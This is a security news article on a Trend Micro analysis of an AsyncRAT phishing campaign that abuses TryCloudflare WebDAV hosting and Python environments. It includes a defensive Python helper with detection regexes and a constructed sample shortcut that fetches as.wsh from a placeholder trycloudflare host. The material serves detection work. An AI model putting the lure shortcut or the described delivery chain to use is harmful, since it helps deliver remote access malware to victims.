AsyncRAT Campaign Abuses Cloudflare Free Tier and Python Environments for Stealthy Deployment
Trend Micro researchers detail a multi-stage AsyncRAT campaign exploiting Cloudflare's free-tier infrastructure and legitimate Python environments to evade detection.

Trend Micro researchers have analyzed a multi-stage AsyncRAT campaign that leverages Cloudflare's free-tier services and legitimate Python environments to deploy the remote access trojan. The attack chain, detailed in a January 12, 2026 report, demonstrates advanced evasion techniques that abuse trusted cloud infrastructure to bypass traditional security solutions.
The campaign begins with phishing emails containing Dropbox links to a ZIP archive named "Rechnung zu Auftrag W19248960825.pdf.zip" (German for "Invoice for Order"). The archive contains an Internet Shortcut file (.url) that points to a WebDAV resource hosted on TryCloudflare domains, which are part of Cloudflare's free-tier service. This abuse of Cloudflare's infrastructure masks malicious activity under legitimate domains, making detection challenging.
Once the shortcut is executed, it downloads a Windows Script Host file (as.wsh) that initiates a multi-stage infection chain. The attack uses legitimate Python downloads from official sources to establish a complete Python environment on the victim's system. This environment is then used to execute sophisticated code injection techniques targeting explorer.exe processes, ultimately delivering the AsyncRAT payload.
The malware ensures persistence through multiple vectors, including startup folder scripts (ahke.bat, olsm.bat), WebDAV mounting, and legitimate "living-off-the-land" techniques using Windows Script Host, PowerShell, and built-in system utilities. These methods help the malware evade detection by blending in with normal system operations.
Trend Micro's Managed Detection and Response (MDR) team observed consistent file naming patterns across cases, with "Rechnung" followed by additional characters. The attack chain was correlated using Trend Vision One, which detected and blocked the indicators of compromise (IOCs) outlined in the report. The final payload, identified as AsyncRAT, provides attackers with keylogging, screen capturing, and remote command execution capabilities.
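As an added example (not code from Trend Micro's report or from this article), the following Python triage helper flags the delivery pattern described above: a "Rechnung" archive with a double extension carrying an Internet Shortcut whose target is a WebDAV resource on a TryCloudflare domain. The regexes, the sample archive and the placeholder hostname are constructed assumptions, not indicators from the report.

```python
import io, re, zipfile
from configparser import ConfigParser, Error as IniError

# Heuristics modelled on the chain described above; patterns are assumptions, not report IOCs.
TRYCLOUDFLARE_RE = re.compile(r"\btrycloudflare\.com\b", re.I)
WEBDAV_RE = re.compile(r"davwwwroot|@ssl|webdav", re.I)
DOUBLE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?)\.(zip|url|wsh|bat)$", re.I)
LURE_NAME_RE = re.compile(r"^Rechnung\b", re.I)

def shortcut_target(text: str):
    """Return the URL= value of an Internet Shortcut (.url) file, or None if unparseable."""
    parser = ConfigParser(interpolation=None)
    try:
        parser.read_string(text)
    except IniError:
        return None
    return parser.get("InternetShortcut", "URL", fallback=None)

def target_findings(url: str):
    """Reasons a shortcut target matches the free-tier WebDAV delivery pattern."""
    reasons = []
    if TRYCLOUDFLARE_RE.search(url):
        reasons.append("target on a TryCloudflare free-tier domain")
    if url.startswith(("\\\\", "file:")) or WEBDAV_RE.search(url):
        reasons.append("target is a WebDAV/UNC resource rather than a web page")
    return reasons

def triage_zip(archive_name: str, data: bytes):
    """Return [(name, reasons)] for the archive name and every .url member inside it."""
    checks = (("lure naming pattern", LURE_NAME_RE), ("double extension", DOUBLE_EXT_RE))
    name_reasons = [label for label, rx in checks if rx.search(archive_name)]
    findings = [(archive_name, name_reasons)] if name_reasons else []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".url"):
                continue  # only Internet Shortcuts are inspected here
            reasons = ["Internet Shortcut inside archive"]
            url = shortcut_target(zf.read(info).decode("utf-8", "replace"))
            reasons += target_findings(url) if url else ["shortcut has no parseable URL="]
            findings.append((info.filename, reasons))
    return findings

def build_sample_zip() -> bytes:
    """Constructed sample mimicking the lure; the hostname is a placeholder, not a real IOC."""
    shortcut = ("[InternetShortcut]\r\n"
                "URL=\\\\placeholder-tunnel.trycloudflare.com@SSL\\DavWWWRoot\\as.wsh\r\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Rechnung.url", shortcut)
    return buf.getvalue()
```

Running `triage_zip("Rechnung zu Auftrag W19248960825.pdf.zip", build_sample_zip())` flags both the archive name and the embedded shortcut; a mail gateway or sandbox hook would feed real attachments through the same function.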
This campaign highlights the evolving tactics of threat actors who increasingly abuse trusted cloud services and legitimate software environments to deliver malware. The use of Cloudflare's free-tier infrastructure and Python environments represents a significant shift in evasion techniques, making it imperative for organizations to adopt advanced detection and response capabilities.